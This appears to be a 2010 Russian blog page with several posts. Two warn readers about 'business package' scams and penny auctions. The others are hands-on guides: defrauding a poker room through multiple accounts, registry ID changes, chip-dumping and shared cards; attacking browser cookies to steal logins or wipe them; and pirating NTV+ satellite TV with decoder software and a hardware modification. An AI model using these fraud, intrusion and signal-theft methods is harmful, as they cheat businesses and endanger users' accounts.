Как разблокировать аккаунт » обман

Мошенничество, основанное на продаже «Бизнес-пакетов».

admin — Tue, 13 Jul 2010 05:05:12 +0000

Если вы хоть немного интересовались темой заработка в сети Интернет, то, безусловно, не раз встречались с предложениями купить за весьма кругленькую (по меркам Интернета) сумму своеобразный «Бизнес-пакет». Этот волшебный инструмент якобы содержит подробнейшую инструкцию по созданию и развитию успешного бизнеса в сети, который при вашем минимальном участии будет приносить не одну сотню баксов в месяц. Здорово, не правда ли? Только все не так просто.
Меня всегда умиляет одна вещь. Зачем продавать какой-то товар в виде бизнеса, приносящий хорошие деньги, если можно зарабатывать на этом самому? Почему вот этот продавец «бизнес-пакетов» сам не получает несколько сотен американских рублей в месяц? Зачем ему надо это продавать за пару десятков долларов? Думаю, ответ вы уже поняли. Этот человек — мошенник. Он проводит достаточно агрессивную рекламу в Интернете, раскручивая до умопомрачения свой сайт. Он пытается впарить свой товар как можно большему количеству людей. Названия этих «Бизнес-пакетов» поражают своей пестротой и шедевральностью — мегаматричный бизнес, Финансовая Кибер-свобода и т.д. Кроме того, вас ожидают еще и бонусы! Вау, Супер! Вам снятся дальние страны, солнечные пляжи, белоснежные яхты… Как жаль, что вы не знали об этом раньше. Рядом можно прочесть отзывы довольных клиентов, пожинающих плоды финансовой кибер-ультра-мега-независимости.
Пестрые фотографии, восторженные слова о легкости и доходности, предлагаемого вам бизнеса. Осталось сделать последний шаг — КУПИТЬ столь вожделенную вещь. И вот свершилось — вы обладатель уникального «Бизнес-пакета». Вам повезет, если там хоть что-нибудь окажется. Как максимум вы получите подробные инструкции, как сделать подобный сайт и продавать …. Угадайте что? Правильно — «Бизнес-пакеты». Дело то это прибыльное :)). Вот таким образом и обманывают нашего брата. Будьте бдительны.

Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!

Скандинавский аукцион.

admin — Tue, 13 Jul 2010 05:04:43 +0000

Сначала для тех, кто не в курсе, немного о том, что такое скандинавский аукцион. Я думаю, об обычных аукционах слышали все, на них продают все, что душе угодно и не угодно. Выставляют лот и заинтересованные покупатели начинают торговаться, постепенно повышая ставку лота. В итоге лот достается тому, кто назначил за него максимальную цену.
В скандинавском аукционе, в общем то, все тоже самое, только с небольшими так сказать «доработками». А именно на торги выставляются лоты за смешную цену, шаг повышения цены всегда фиксирован, и каждое повышение цены обходится участнику аукциона в некоторую сумму. Время проведения аукциона в большинстве случаев ограничено, хотя на некоторых аукционах продлевается на автомате. Если кто-то делает ставку, то время проведения аукциона продлевается на полминуты. Лот достается тому, кто сделал последнюю ставку.
Для лучшего понимания как это работает, рассмотрим пример. На торги выставляется видеокамера, стартовая цена лота 1 рубль. Шаг аукциона 10 рублей, стоимость одной ставки 10 рублей. Понятно, что каждый хочет владеть видеокамерой за такие смешные деньги. Поэтому участники начинают делать (считай покупать) ставки.
Сделал ставку первый участник, заплатив за это 10 рублей, и видео камера стала стоить 11 рублей. Сделал ставку второй, цена камеры поднялась до 21 рубля, сделал третий — цена стала 31 рубль. В итоге, предположим, всего было сделано 500 ставок, на этом время проведения аукциона истекло. Выигравший получил видеокамеру за 5001 рубль плюс те деньги, которые он потратил, делая ставки.
В общем то неплохо, если предположить, что рыночная цена такой камеры, например, составляет 8000 рублей. В этом случае, покупатель сэкономил 3000 рублей минус деньги потраченные на ставки, а сервис, организовавший аукцион, тоже в накладе не остался. Прибыль сервиса составила 5001 (цена камеры) + 5000 (цена за проданные ставки) — 8000 себестоимость камеры. Итого 2001 рубль.
Со стороны скандинавский аукцион больше напоминает лотерею или азартную игру, но у меня всегда в этих случаях встает вопрос: А где гарантии? Гарантии того, что организаторы скандинавского аукциона ведут себя честно.
По-моему, еще не так давно были времена, когда на улицах любого города России можно было встретить лохотронщиков. Эти умники тоже организовывали что-то типа лотереи, в которой почему-то всегда оказывалось два победителя, один из которых был подставным лицом.
Далее в ходе торгов за приз очень быстро доверчивый гражданин оставался без денег, еще бы, ведь подставной участник не ставил свои деньги, ему их просто незаметно передавали, так сказать, устраивали небольшой круговорот финансовых средств. Да что я вам рассказываю, вы наверное и без меня прекрасно знаете схему такого лохотрона.
И в случае со скандинавским аукционом ситуация точно такая же. Его организаторы под вымышленным ником могут спокойно принимать участие в аукционе, они его владельцы, и могут спокойно нарисовать на счету любого аккаунта какую угодно сумму. Такая ситуация возможна на любом скандинавском аукционе. Я не говорю, что она происходит всегда и на всех подобных аукционах, потому что сам лично я эту информацию не проверял, да и если честно проверять не собираюсь. Зачем рисковать собственными деньгами. Я лишь говорю здесь о возможном мошенничестве со стороны организаторов скандинавских аукционов.
Но вопрос то все-таки остается? Где гарантии, что скандинавский аукцион — это не лохотрон. Ради интереса я ввел в поисковую строку Яндекса запрос «скандинавский аукцион» и попытался проанализировать выдачу.
Что я обнаружил, а точнее не обнаружил. На какой сайт не зайди в контактных данных только e-mail, у некоторых нет даже мыла, можно отправить только сообщение с сайта. Ни адресов, ни телефонов, ни реквизитов компании, которой принадлежит этот web-ресурс, одни улыбающиеся лица победителей прошлых аукционов, вымышленные или нет, сам черт не поймет.
А если всего этого нет, как я могу быть уверен, что меня не обманут. Ответ однозначен никак. И более того, по моему мнению, скандинавский аукцион — по всем признаком подпадает под категорию азартных игр. А раз так помимо солидности компании, у нее еще должна быть соответствующая лицензия на право вести игорный бизнес.
Я не буду с ходу поливать все скандинавские аукционы грязью и кричать, что кругом одни мошенники. В конце концов такие выводы может делать только суд на основании определенных фактов. А факты в каждом конкретном случае разные.
Вот пару дней назад на одном сайте увидел такое объявление.
Скандинавский аукцион — это вид аукциона,
при котором товар или услуга выставляется
на продажу по минимальной стоимости.
Разберем все на примере:
На торги выставляется Смартфон Apple iPhone 3G 16Gb рыночной стоимостью 27000 рублей. Начальная стоимость — 1 рубль. Шаг аукциона — 25 копеек. Плата за ставку — 7 рублей. Всего в ходе торгов было сделано 1526 ставок, из них наш участник Вася сделал 10 ставок, и восьмая оказалась последней.
К этому времени аукционная цена достигла 382.5 руб. (1 руб. + 1526 ставок * 25 коп.). Вася получит телефон за 452.5 руб. (из них, 382.5 руб. — аукционная цена, 70 рублей Вася потратил на 10 ставок по 7 рублей каждая). Итого, Вася сэкономил 26547.5 руб. Удачная покупка!
На нашем аукционе выставляются исключительно новые лоты. Например, смартфоны, фотоаппараты, сотовые телефоны, игровые приставки, ноутбуки, подарочные карты, микроволновые печи, mp3-плееры, телевизоры и т.д.
Эти товары никогда не будут лишними.
Действительно покупка удачная, в том случае если этот мифический Вася реально существует. Объясню, почему мне так кажется. Давайте просто подсчитаем, только не с точки зрения Васи, а с точки зрения хозяина аукциона. Значит всего сделано 1526 ставок ценой в 7 рублей каждая. Итого аукцион получил 10682 рубля плюс собственно 382,5 рубля за смартфон. Итого получается чуть больше 11000 рублей. А рыночная цена смартфона составляет 27 000 рублей. Итого чистый убыток аукциона составил 16000 рублей.
Вопрос! Они что деньги зарабатывают? Или занимаются благотворительностью? Вообще в благотворительность скандинавского аукциона верится с трудом, в таком случае как они зарабатывают деньги при такой торговле. Может быть на контексной рекламе или банерной рекламе? Тоже нет. Ни один нормальный проект не станет рекламироваться на сайте, где тусуется толпа халявщиков.
Вопрос так и остается без ответа, хотя нехорошие подозрения появляются.
Что же мы получаем в итоге? А в итоге получается следующая ситуация. Честность игры на скандинавском аукционе целиком и полностью зависит от честности его устроителей. Для меня таких гарантий явно недостаточно, не верю я в человеческую честность. Так что пока я не увижу, что аукцион принадлежит солидной компании, пока на сайте не будет выложена хотя бы лицензия, дающая право заниматься игорным бизнесом, я скандинавский аукцион буду обходить стороной, что и вам советую

Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!

Как развести покер-рум

admin — Tue, 13 Jul 2010 05:04:41 +0000

Статья написана для людей любого рода деятельности, но которые хотят заработать в интернете, невзирая на мошенничество
(статьи писать не умею, так что если изложил не доходчиво, то нагами не пинайте, старался как мог, статья первая )
Здрасте.
Я знаю способ как можно зарабатывать примерно 50$ и более в день
(в зависимости от вашего труда)
Скажу сразу что этот способ, является мошенничеством, но несмотря на это будем наказывать буржуев
Даже если вас запалят, что вы играете не честно, то вам ничего не будет! Максимум заблокируют акк.
Начнём.
Мой друг часто играет в онлайн-покер и знает кто и сколько даёт бездепозитных бонусов.
Он наткнулся на замечательный онлайн-покер рум WolfWhitePoker, он предоставляет новым игрокам бонус в
размере 5$ сразу! Я уже не помню как и прикаких обстоятельствах мы начали изучать данный покер-рум, мы
ковырялись несколько дней и наш труд себя оправдал.
Подробнее о покер-руме.
При регистрации (по специальной ссылке) вам сразу начисляют 5 уе. Но естественно нам было интересно по чём
именно идёт привязка, т.к. если создать 1 акк, то на второй уже бонус не приходит!
При детальном изучении мы выяснили, что привязка идёт по ip (ну это естественно) и id винды. Т.к. ip у нас динамический, то 1 момент мы уже сразу откинули (если у вас ip статический, то юзайте прокси).
При создании каждого нового акка вы должны менять ip и id винды!!!
Шаг 1.
Регимся, по спец ссылке (сейчас она

https://www.whitewolfpoker.com/ru.get-started.sign-up?bonus=pokerfree5)

Шаг 2.
сливаем деньги своему другу Хоче предупредить что не так всё просто, т.к. при слитии лучше играть не 1
на 1 (ты и друг), а играть и с другими игроками, т.к. при выплате денег, они просматривают статистику
игрока, с кем он играл и т.д.
Шаг 3.
Когда деньги слили другу, то друг пусть играет (работает на статы), а вы тем временем меняйте ip и id винды. IP меняется прокси (если не динамический), а id винды меняется пуск > выполнить > пишем regedit > находим HKEY_LOcAL_MACHINE > SOFTWARE > MICROSOFT > CURENT VERSION > Product ID (вот тут и меняйте)
Заметки.
1. Ваш друг должен создать только 1 акк (на который и будут сливаться деньги) и под своими реальными данными, т.к. при выводе денег они проверяют.
2. Ваш друг должен играть не только с вами, но и другими игроками, т.к. при выводе денег просматривается статистика игрока.
3. Играйте на безлимитке, т.к. быстрее сливаются деньги, НО НЕ СТАВЬТЕ СРАЗУ ВСЕ ДЕНЬГИ!!! т.к. могут заподозрить в нечестной игре (курочка по зёрнышку клюёт), продумайте способ кто сколько кому будет сливать.
4. Говорите друг другу свои карты. (Желательно общаться по скайпу, чтобы долго не писать)
5. Данный покер-рум ещё молодой и активно следит за играми игроков.
6. При выводе денег у вас могут попросить скан вашего паспорта.

Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!

Взлом через cookie

admin — Tue, 13 Jul 2010 05:04:39 +0000

конецформыначалоформыЗачем Cookie нужен? Дело в том, что HTTP-протокол — одноразовый, если так можно выразиться. Т.е. каждый раз заходя на страничку, пользователь начинает сначала, что бы он не вводил, и какие изменения бы не делал. Cookie помогает создать иллюзию, что пользователя помнят на сайте. Пользователю не нужно вводить сотню раз одну и ту же информацию от странички к страничке, и даже от сессии к сессии, она хранится у него на диске. К удобству можно отнести еще и то, что эту информацию пользователь всегда сможет сменить у себя на диске «на лету». В Cookie также могут храниться другие разнообразные данные. Например, количество посещений какой-то страницы, время посещений. С помощью cookie не составляет труда сделать маленький органайзер или корзину в виртуальном магазине.
Cookie многие не любят из-за ее небезопасности. Многие аналитики говорят, что это не проблема, и ничего плохого с помощью данной технологии сделать нельзя. Я с этим глубоко не согласен, если кто-то может читать информацию из файла(ов) cookie, то это уже небезопасно. Приведу чисто теоретические примеры, которые, при желании, не трудно воплотить в реальность.
1. Допустим, пользователь зашел на почтовый сайт, заполнил форму с login’ом и паролем, которые записались в cookie, пускай даже через Secure Socket Level. Взломщик написал письмо пользователю в формате HTML с параметрами чтения cookie с паролями. Прочитав cookie, HTML-файл или запрашивает у пользователя разрешение отослать информацию взломщику, где пользователя можно обмануть ложной надписью а ля «Ошибки в сценариях Javascript!». Даже довольно опытный пользователь не задумываясь нажмет OK, после чего login и пароль отошлется взломщику. Или взломщик может добавить 0-ой фрейм, где будет временно содержаться информация из cookie, которая при ответе на письмо, будет вставляться в конец письма. Все это нетрудно сделать с помощью FORM и Javascript.
2. Пример с виртуальным магазином. Допустим, мы имеем гипотетический магазин shop.provider.com. Совершая покупки в данном магазине, пользователь хранит информацию в cookie. Параллельно или до захода в магазин, пользователь зашел на гипотетическую страницу взломщика hacker.provider.com, где изменялись настройки cookie виртуального магазина. Взломщик может изменить количество покупок, имя, адрес, и все то, что хранится в данном cookie. Я думаю, вам бы не понравилось, если к вашим покупкам прибавили пару мониторов или отвезли ваши покупки не тому пользователю. Сделать это довольно просто, если иметь страничку в домене магазина второго или третьего уровня. Несколько других, уже ПРАКТИЧЕСКИХ примеров.
Итак, для пользователя технология cookie представляет собой несколько файлов в папке %WINDOWS%\Cookies (по умолчанию в Internet Explorer), либо всего один файл cookie.txt (если это Netscape Navigator и другие броузеры). Сайты периодически добавляют информацию в cookie и ее же забирают. Естественно, в спецификациях Cookie предусмотрены некоторые элементы защиты.
Всего Cookies может быть не больше 300.
Каждый Cookie не может быть больше 4kb.
С одного домена второго уровня (плюс подуровни) не может быть получено больше 20 Cookies.
Информация из Cookie одного домена второго уровня (плюс подуровни) не может быть прочитана другими доменами.
Если документ кэшируется, то информация о cookie не кэшируется.
Информация в\из Cookie может передавать с помощью протокола SSL. Если лимит исчерпывается, первые записи удаляются. Если Cookie становится больше 4kb, первые байты вырезаются.
Формат Cookie. Полную спецификацию на английском можно найти на http://www.netscape.com/newsref/std/cookie_spec.html. В моей статье только сокращенное описание. Информация в Cookie задается принципом ИМЯ=ЗНАЧЕНИЕ. В одном документе может содержаться несколько Cookies (не больше 20). Минимальное описание поля Cookie выглядит так:
Set-Cookie: NAME=VALUE; Максимальное выглядит так: Set-Cookie: NAME=VALUE; expires=DATE; path=PATH; domain=DOMAIN_NAME; secure
NAME=VALUE — NAME — Имя Cookie, VALUE — Значение. Можно менять как NAME, так и VALUE. Используются любые символы, кроме символа переноса строки, двоеточия, запятой и пробела. Пример: Имя=Вася
expires=DATE — Дата окончания действия Cookie. Менять только DATE. Вид такой: «expires=День, Число-Ден-ГГГГ ЧЧ:ММ:СС GMT». Если expires не обозначен, Cookie хранится до закрытия окна броузера. Пример: expires=Fri, 14-Sep-2005 13:13:13 GMT
domain=DOMAIN_NAME — домен на котором действителен Cookie. Вид такой: «domain=domain.com». Cookie будет действителен как для www.domain.com, так и для myname.domain.com. В зоне RU и других локальных зонах не работает. Используется только для COM, EDU, NET, ORG, GOV, MIL и INT. Если domain не обозначен, используется доменное имя сервера с Cookie. Пример1: domain=mamapapa.com Пример2: domain=gazzzeta.da.ru
path=PATH — Указывает имена докментов, для которых действительно значение Cookie. Вид такой: «path=/word». Cookie будет отсылаться в директориях /word, /word2000 и файлов в текущей директории с именами word.htm, wordchampion.html. Для применения Cookie ко всему серверу указывается корневой каталог сервера /. Если path не указан, Cookie распространяется только на текущую директорию. Пример1: path=/gazzzeta Пример2: path=/
secure — Если указан, при передаче Cookie используется HTTPS (HTTP с SSL — Secure Socket Level). Если secure не указан, Cookie передается HTTP.
Если Cookie использует одинаковое значение NAME, domain и path — старое значение заменяется новым.
Вставка Cookie в HTML. Вставить Cookie можно несколькими способами. Самые простой — это через META-тег. Альтернативным способом является Javascript и всевозможные другие технологии (CGI, PHP, SSI и т.д.). Рассматривать CGI, PHP, SSI и прочие мы не будем, т.к. это требует от вашего домена, где располагается страница, возможности использования этих технологий, что бывает не всегда.
Использование Cookie через META-тег. Между тегов и Cookie вписывается так: Можно использовать несколь META-тегов с Cookie в одном документе. Пример:
Использование Cookie через Javascript. Использование Cookie с помощью Javascript является самым популярным способом, т.к. это довольно просто для разработчика, не требует от сервера определенного программного обеспечения и может использовать динамичные данные, генерируемые внутренним Javasript-скриптом, либо вводимые пользователем. Вот примера скрипта Javascript, используещего Cookie. Скрипт не мой, но он точно описывает те возможности, о которых мы говорим. К сожалению, автора скрипта я не знаю поэтому указать не могу.
Останавливаться на данном скрипте смысла нет, статья о Cookie, а не о Javascript.
Как видите, технология Cookie предоставляет огромные возможности для разработчиков сайтов. Cookie поддерживается всеми более или менее известными броузерами, такими как Netscape Navigator, Microsoft Internet Explorer, Mosaic, Opera и другими, начиная с самых первых версий.
Взлом через Cookie
А зачем мне все это надо? Технология cookie используется при заполнении полей, хранения информации, для виртуальных корзин в Интернет-магазинах, в баннерных сетях и много чего еще. Но также эта технология используется взломщиками для достижения своих целей. 1. Радость от гадости. Первый пример основан на том, что по спецификациям, броузер может хранить не больше 20 записей от одного домена. При переполнении данного лимита, старые записи затираются новыми.
Использование: Закачать HTML-файл на тот сервер, откуда пришли cookie. Можно послать по E-mail, если жертва читает почту через Web, все cookie от его почтового сервера сотрутся. Если нужно удалить все cookies с *.домен.com, заменять строчки примера на Работает только с доменами COM, EDU, NET, ORG, GOV, MIL, INT. Сам пример файла:
…
Сохраняй этот файл как cook.htm, он нам еще пригодится.
2. Полная гадость. Вторая гадость основана на том, что общее количество cookies может быть не больше 300. При переполнении лимита, старые записи также затираются новыми. Уловил мысль? Затираем все cookies жертвы. Сначала тебе придется завести 15 аккаунтов для страничек на разных серверах. Заходим на всякие narod.ru, заводим аккаунты cook.site1.ru, cook.site2.ru и т.д. до cook.site15.ru. Затем заливаем на каждую страничку файл cook.htm, который мы использовали в прошлой гадости. На все это у тебя должно уйти не больше часа при нормальной раскладке пальцев \m/. Создаем файлик index.html и вписываем туда следующее:
Заливаем созданный файл в любое место, например на cook.narod.ru. Зайдя на этот сайт, у пользователя будет вычищаться весь cookies, накопленный годами, за пару секунд.
3. Почему нельзя забить дисковое пространство или сделать buffer overflow? Дело в том, что каждый cookie не может быть больше 4kb. Если лимит превышен, начало cookie удаляется. Максимум, что можно сделать — забить жертве 1,2mb дискового пространства при хорошем качестве связи у жертвы, либо disconnect’ить жертву при плохой связи. Для этого меняй строчки в cook.htm на следующее:
Защита. Способов защиты несколько и каждый способ довольно неудобен.
1. Отменить использование cookie в броузере. Недостаток в том, что пользователь фактически отказывается ходить на огромное количество сайтов.
2. Завести программу из класса Cookie Manager. Недостаток в том, что надо постоянно держать лишнюю программу. А это для интернетчика с включенным Firewall’ом, антивирусным монитором, ICQ, Dialer’ом и т.д. довольно большое неудобство.
3. Не вступать в случайные связи. Недостаток в том, что твои «проверенные» друзья тоже могут над тобой подшутить, да и не вступать в случайные связи — значит сидеть дома и наслаждаться сайтами по адресу 127.0.0.1.

Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!

НТВ+ бесплатно

admin — Thu, 13 May 2010 05:05:32 +0000

Как смотреть НТВ+ и другие каналы
Как смотреть НТВ+ и другие каналы, кодированные в системе Nagravision-Syster, если нет возможности смотреть их официально?Ответы на наиболее часто задаваемые вопросы на основе собственных наработок.
Этот FAQ предназначен для тех, кто увлекается спутниковым телевидением, компьютерами, кто любит экспериментировать, не боится неудач.
Внимание! Информация только для образовательных целей.
Коммерческое использование преследуется по закону.
Вопрос первый, самый глупый, но вдруг кто-то не знает? Что такое НТВ+ и какие проблемы с его просмотром?
Какие способы пиратского просмотра каналов кодированных Nagravision-Syster вообще существуют?
Что такое PC-TV и какие телеканалы можно смотреть используя его?
Что для этого надо ?
Какая карта видео-захвата для этого нужна?
Какой программой лучше пользоваться?
Как и что правильно подключить?
Как правильно настроить программу?
Как открыть звук?
Как вывести изображение на телевизор?
Как часто телекомпании меняют коды?
Можно ли обойтись без компьютера?
Спутниковое телевидение существует как бесплатное, так и коммерческое, для просмотра которого надо платить телекомпании абонентскую плату. Для того чтобы обеспечить сбор абонентской платы, телекомпании кодируют свой сигнал, то есть делают не возможным просмотр его без специального декодера. Телекомпания НТВ+ использует Французскую систему кодирования Nagravision-Syster,в которой используется перемешивание строк по особому алгоритму, в соответствии с таблицей перестановки строк. На рисунке видно, как выглядит изображение, если его попытаться смотреть без декодера. Кроме того, применяется инверсия спектра звукового сопровождения частой 12,8 кГц, что очень сильно искажает звук, делая не возможным его прослушивание. Вдобавок ко всему, для разграничения доступа оплативших и не оплативших подписку абонентов, применяется система адресного кодирования — то есть телекомпания имеет возможность сигналом со спутника избирательно выключать декодеры не оплативших абонентов. Достигается это тем, что у подписчиков имеются индивидуальные ключи, представляющие собой микросхему памяти, в которой содержится индивидуальный код, а так же обновляемая через спутник информация о состоянии подписки. Эту же систему кодирования применяют телекомпании Германии, Франции, Польши, а так же ряда других стран. Существуют и другие системы кодирования, такие как D2MAC, Videocript, и т.д. но в этой статье мы их описывать не будем. Не смотря на то, что этой системе уже более десяти лет, протокол обмена данными между ключом и декодером телевизионными пиратами изучен мало (наверно просто это было ни кому не нужно), о работающих эмуляторах ключей пока не слышно.
Система кодирования Nagravision-Syster была взломана другим способом — появились пиратские декодеры, которые работают безо всяких ключей на принципе подбора кода пут|м сравнения и поиска похожих строк. Такие декодеры открывают все каналы, на которые они рассчитаны и совершенно бесплатно. К сожалению, купить такой декодер у нас пока не возможно, а сделать тоже очень сложно в основном из-за отсутствия необходимой информации.
Но недавно появилась возможность смотреть НТВ+ и другие каналы кодированные в Nagravision-Syster с помощью персонального компьютера, используя тот же принцип, что и у пиратского декодера, но реализуя его с помощью специальной программы. Этот способ получил общее название PC-TV. PC-TV позволяет смотреть все каналы, кодированные в Nagravision (смотри таблицу).
Что нужно для просмотра кодированных каналов таким способом?
Во-первых, нужен настроенный комплект спутникового телевидения, состоящий как минимум из антенны (тарелки), конвертера и ресивера. Эта система должна обеспечивать уверенный при|м тех кодированных каналов, которые вы хотите смотреть. Для случая с НТВ+ достаточно иметь родной «НТВшный» комплект с «тарелкой» того диаметра, который достаточен для при|ма сигнала в вашей местности, можно без оригинального декодера.
Во вторых, нужен достаточно мощный IBM совместимый персональный компьютер, минимум — P-166MMX, 32Mb RAM, видеоадаптер PCI 4Mb, желательно P-II с как можно большей тактовой частотой и оперативной памятью 64Mb. Объ|м и скорость ж|сткого диска, а так же другие параметры, существенно не влияют.
В третьих, для ввода изображения в компьютер, нужна карта видеовхода, построенная на одном из следующих чипов — BT848, BT849, BT878, BT879. Сейчас таких карт выпускается достаточно много, разными фирмами, под разными названиями, на пример: MiroPCTV, AverMedia различных модефикаций, Fly Video(наверно самый дешевый вариант), MR Vision TV Link, ТЕЛЕМАСТЕР. Продолжать список можно ещ|, но нет смысла — подойд|т любая карта, лишь бы она была сделана на чипе серии BT8XX. Карты отличаются друг от друга наличием и качеством встроенного TV тюнера для просмотра обычных эфирных телеканалов, наличием дистанционного управления тюнером, количеством видеовходов -1 или 2, качеством и удобством прилагаемого к ней софта и некоторыми другими наворотами, которые ни каким образом не связаны с нашей задачей, так как в данном случае требуется только видеовход. В последнее время стали появляться версии программ для видеоадаптеров на чипе ATI c видеовходом (без BT8XX), но так как у меня такой карты нет, то я их не тестировал и ничего про них сказать не могу.
На сегодняшний день написано несколько программ — декодеров, которые совершенствовались их авторами (и не только авторами, потому, что почти все они публиковались вместе с исходными текстами) и имеют каждая по несколько версий. У каждой программы есть свои достоинства и недостатки, и стоит попробовать их все, чтобы сделать для себя выбор. Лично мне более других понравилась MoreTV 3.10 — на мой взгляд, это наиболее удачная программа, которая позволяет смотреть каналы как в стандарте PAL, так и SECAM (НТВ+). У не| реализовано автоматическое включение-выключение декодирования при переходе от кодированных к не кодированным каналам, прямое взаимодействие с картой видео-ввода (достаточно установить драйвер карты, софт можно не ставить, программа сама настраивает карту), имеются удобные оперативные регулировки с помощью горячих клавиш, достаточно легка в настройке. К недостаткам данной программы можно отнести не очень хорошую чистоту цвета в режиме SECAM (хотя у некоторых других программ при просмотре SECAM цвет вообще отсутствует), и интерфейс на немецком языке. Надо учесть, что для видеоадаптеров с видеовходом на чипе ATI, должна быть специальная версия программы- MoreATI-TV.
После того как вы установили карту видеовхода в ваш компьютер, надо соединить НЧ-вход карты с НЧ-выходом вашего ресивера с помощью специального низкочастотного кабеля, такого же, каким вы подключаете телевизор к ресиверу или видеомагнитофону. Установите драйвер и программное обеспечение карты, руководствуясь инструкцией прилагаемой к ней. В результате, если вы сделали вс| правильно, то при включенном ресивере и запущенной программе от карты, вы должны получить на экране компьютера устойчивое изображение того канала, на который настроен в данный момент ваш ресивер, в том виде, в каком оно переда|тся со спутника (т.е. если канал кодированный, то изображение будет напоминать фотографию). Не забудьте, что декодер в настройках ресивера должен быть выключен.
Теперь можно приступить к установке и настройке программы — декодера. Программы в основном не требуют инсталляции и достаточно просто распаковать архив в любую директорию, желательно в корневом каталоге вашего жесткого диска. В дальнейшем речь пойд|т о настройках программы MoreTV 3.10 — если вы е| сумеете запустить, то и с остальными программами вы сумеете разобраться сами. Первым делом скопируйте в каталог с программой файл Key.txt предназначенный для НТВ+, если вы настроили ресивер для его при|ма. Учтите, что Key.txt для НТВ+ и для других каналов разные! Не забудьте переименовать файл Key2.txt (извлеченный из архива) в Key.txt (без цифры) и запустите программу.
На экране появится окно настроек программы. В рамке «Video» установите для начала разрешение 640х480YUY2 и поставьте флажок SECAM. В рамке «Hardware» выберите из списка вашу карту (если е| нет в списке, сильно не расстраивайтесь, выберите любую другую, лишь бы на таком же чипе как у вас) марку тюнера можно не устанавливать — он нужен только при при|ме кодированных каналов с эфирной антенны, PLL для начала лучше не включать. В рамке «Dekodierung» установите количество тестовых строк равным 30 и сохраните настройки (средняя кнопка). Теперь можно запускать собственно программу (верхняя кнопка). Первый запуск программы может продлиться несколько дольше чем обычно (в это время программа созда|т в сво|м каталоге индексный файл с именем MoreTV_XX.idx, где ХХ — количество тестовых строк), в дальнейшем программа будет запускаться практически мгновенно. Вы должны увидеть на экране декодированное изображение. Если экран останется синим, проверьте все соединения, а если у вашей карты два входа, попробуйте подать сигнал на другой вход. Если изображение есть, но не декодированное, проверьте тот ли Key.txt вы используете (если открыть его блокнотом, он должен начинаться так : 0 1 2 3 4 5 6 7 2 5 4 7 8 9 10 11 14 17 16 19 22 25). Если вс| заработало, попробуйте поэкспериментировать с настройками программы для достижения лучшего качества изображения.
«Горячие клавиши» программы:
Esc — стоп кадр, F1 — восстановление после стоп кадра, F2 — включение декодера (включен / выключен / авто), F3 — F8 — изменение формата и размера декодируемого изображения, F10 — выход из программы, F11 — Турбо / стандартный декодер, F12 — синхронизация по фазе, Insert — контрастность + , Delet — контрастность — , Home — насыщенность + , End — насыщенность — , PgUp — яркость + , PgDn — яркость -, остальные клавиши предназначены для настройки и переключения каналов встроенного TV тюнера, и для нас значения не имеют.
Программа MoreTV не имеет встроенного декодера звука, и поэтому декодирование звука — тема отдельного разговора. На сегодняшний день есть три способа прослушивания звукового сопровождения. Способ первый, самый простой, и самый худший. Скачайте одну из программ — аудио-декодеров (лично мне больше нравится DCPlus), соедините выход звука ресивера с линейным входом звуковой карты вашего компьютера, в настройках стандартного регулятора громкости Windows включите линейный вход на запись, и обязательно выключите на воспроизведении (чтобы предотвратить проникновение кодированного звука непосредственно со входа на выход без обработки программой). Запустите программу с установками по умолчанию, и звук должен заработать. Качество звука регулируется настройками программы. Не забудьте, что для этого ваша звуковая карта обязательно должна поддерживать Full Duplex — то есть одновременную запись и воспроизведение звука, и эта опция должна быть активизирована в настройках звуковой карты (установить флажок «разрешить двунаправленную работу»). Кроме того, одновременная работа программ аудио и видео декодеров возможна только на достаточно быстрых машинах, а если конфигурация вашего компьютера соответствует только минимальным требованиям, то этот способ для вас непригоден (в зависимости от используемой программы и е| настройки будет «заикаться» звук, либо срываться картинка). Второй способ подойдет тем, у кого есть оригинальный декодер с неоплаченным ключом и кто не боится держать в руках паяльник. Аккуратно вскройте декодер, найдите микросхему с надписью EURO@DEC 5096 ELEXC7397A. Отпаяйте сопротивление от седьмой ноги микросхемы и подайте на эту ногу микросхемы логическую единицу (+5В) через сопротивление1-10к (найдите напряжение +5В с помощью тестера по цепям питания). Соблюдайте осторожность, так как на плате декодера присутствует высокое напряжение!!! Ошибка в ваших действиях может привести к серьезной поломке декодера!!! После этой переделки декодер открывает звук и без оплаты. Третий способ годится для опытных радиолюбителей. Соберите самодельный декодер по привед|нной схеме. Этот способ наиболее сложен, но наверно самый лучший, так как не требует наличия оригинального декодера, не занимает ресурсы компьютера, звук не запаздывает по отношению к видео как в программных декодерах.
После того, как у вас все| получилось, возможно вам захочется вывести изображение на телевизор. Для этого ваш видеоадаптер должен иметь TV-OUT. Практически все современные модели видеоадаптеров имеют модификации с выходом на телевизор. Это видеоадаптеры на таких чипах как: RIVA TNT, RIVA 128, ATI, INTEL 740, S3 VIRGE GX2, а так же некоторые другие. Телевизор подключается к выходу видеоадаптера (чаще всего это обычный «тюльпан») кабелем, аналогичным тому, которым вы подавали сигнал на вход карты видеовхода. Настраивается адаптер в соответствии с руководством пользователя, прилагаемого к нему. Надо заметить, что практически все видеоадаптеры «усекают» или «поджимают» изображение по вертикали примерно на 5-10%. Это связано с несоответствием количества строк в телевизионном стандарте и изображении формируемом видеоадаптером. Существуют специальные дополнительные карты-TV OUT которые преобразуют стандартное SVGA изображение, формируемое любым видеоадаптером в полноценный сигнал формата PAL, но я встречал о них информацию только в интернете, и пока не разу не видел их в продаже.
Часто задают вопрос — часто ли телекомпании меняют код, и отличается ли он на разных каналах одного пакета программ? Здесь можно пояснить, что программные декодеры не требуют никаких кодов, они их подбирают «на ходу» методом сравнения соседних строк. В алгоритме декодирования используется только таблица перестановки строк (файл Key.txt) одна для всех каналов НТВ+. В оригинальных декодерах эта таблица содержится в программе-прошивке центрального процессора, т.е. программируется однократно при изготовлении декодера. Соответственно сменить эту таблицу можно, только заменив все декодеры у официальных подписчиков (именно декодеры, а не ключи), что в наших условиях практически не реально.
